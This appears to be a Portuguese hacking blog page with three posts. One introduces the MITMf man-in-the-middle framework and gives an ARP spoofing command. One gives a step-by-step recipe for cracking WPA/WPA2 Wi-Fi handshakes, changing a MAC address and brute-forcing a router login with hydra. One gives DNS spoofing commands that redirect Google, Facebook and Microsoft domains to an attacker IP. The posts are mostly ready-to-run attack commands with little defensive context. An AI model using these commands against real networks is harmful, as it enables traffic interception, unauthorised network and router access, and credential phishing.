MITMf Framework Man-In-The-Middle attacks

O que é um Ataque Man-in-The-Middle

" OBS.. Post Em Edição... "

O man-in-the-middle (pt: Homem no meio, em referência ao atacante que intercepta os dados) é uma forma de ataque em que os dados trocados entre duas partes, por exemplo você e o seu banco, são de alguma forma interceptados, registrados e possivelmente alterados pelo atacante sem que as vitimas se apercebam. Fonte

MITMf é um Framework para ataques Man-In-The-Middle

Esta é uma ferramenta baseada python com vários plugins que adicionam mais funcionalidade (e flexibilidade) à sua rotina de testes de penetração e, assim, torná-lo mais rápido e mais produtivo

Plugins disponíveis:

Spoof – Redirect traffic using ARP Spoofing, DNS Spoofing or ICMP Redirects

BeEFAutorun – Autoruns BeEF modules based on clients OS or browser type

AppCachePoison – Perform app cache poison attacks

BrowserProfiler – Attempts to enumerate all browser plugins of connected clients

CacheKill – Kills page caching by modifying headers

FilePwn – Backdoor executables being sent over http using bdfactory

Inject – Inject arbitrary content into HTML content

JavaPwn – Performs drive-by attacks on clients with out-of-date java browser plugins

jskeylogger – Injects a javascript keylogger into clients webpages

Replace – Replace arbitary content in HTML content

SMBAuth – Evoke SMB challenge-response auth attempts

Upsidedownternet – Flips images 180 degrees

Referência Aqui;

                                      Source && Download
                                          mitmf download
Command:

:~# apt-get update && apt-get install mitmf

Command Basic

:~#  mitmf --spoof --arp --interface eth0 --target 192.168.1.6 --gateway 192.168.1.1

                                   " OBS.. Post Em Edição... "

--interface = Interface de rede eth0/eth1 ou wlan0/wlan1
--target     = Alvo que você deseja spofar
--gateway =  Ip do roteador q você o alvo estao conectados
 

Video:

MITMf Framework Man-In-The-Middle attacks from Mathew Thomas on Vimeo.

Read More

Quebrando Senha de Rede Wi-Fi WPA/WPA2 + MacChanger + Crack HTTP Password Hydra

" Quebrando Senha de Rede Wi-Fi WPA/WPA2 "
" Clonar Mac "
" Quebrando Senha HTTP Modem "
Step 1

$ airmon-ng

Step 2

$ airmon-ng start wlan1

Step 3

$ airodump-ng mon0

Comando "airodump-ng mon0" Salve em um bloco de notas o: BSSID, CHANEL, ESSID.
BSSID = 00:00:00:00:00:00
CH = 00
ESSID = Wiless_Name
Step 4

$ airodump-ng --bssid 00:00:00:00:00:00 -w handhash -c 00 mon0

O Comando "airodump-ng --bssid 00:00:00:00:00:00 -w handhash -c 00 mon0" Salve alguma estacao.
STATION = 00:00:00:00:00:01
Step 5

$ aireplay-ng -0 0 -a 00:00:00:00:00:00 -e Wiless_Name --ignore-negative-one mon0

Step 6

$ aircrack-ng handhash-01.cap -w /usr/share/dirb/wordlists/big.txt 

Trocando o Mac
Step 7

$ ifconfig wlan1 down

$ macchanger --mac 64:89:9A:18:28:03 wlan0

YOUR MAC: 00:00:00:00:00:02 (Name)
Save your mac on Notepad
Step 8

$ ifconfig wlan0 up

Cracking Modem password
Step 9

hydra -l admin -P /usr/share/dirb/wordlists/big.txt -e ns -t 10 -s -vV 192.168.0.1 http-get

Video:

Quebrando Senha de Rede Wi-Fi WPA/WPA2 + MacChanger + Crack HTTP Hydra from Mathew Thomas on Vimeo.

Read More

Kali Linux DNS Spoofing

Awe pessoal hoje vou falar um pouco sobre DNS Spoof;

O que é DNS Spoof?


DNS Spoof é uma técnica em que os hackers usa para redireciona um sites  que as vítimas querem acessar.
A maioria das pessoas que usam páginas fakes fazem isso.

Falsificação de DNS (ou cache DNS envenenamento) é um computador de hackers ataque, segundo o qual os dados são introduzidos em um Domain Name System (DNS) resolver 's de cache , fazendo com que o servidor de nomes para retornar um incorreto endereço IP , desviando o tráfego para o
computador do atacante (ou qualquer outro computador). Fonte: Wikepedia

Comando:

$ echo "1" >> /proc/sys/net/ipv4/ip_forward

$ arpspoof -i wlan0 192.168.0.1

Creie uma Lista ex:

66.135.216.190 *.google.com
66.135.216.190 mail.live.com
66.135.216.190 br.msn.com
66.135.216.190 m.facebook.com
66.135.216.190 www.facebook.com
66.135.216.190 pt-br.facebook.com

$ dnsspoof -i wlan0 -f lista

Video:

Kali Linux DNS Spoofing from Mathew Thomas on Vimeo.

Read More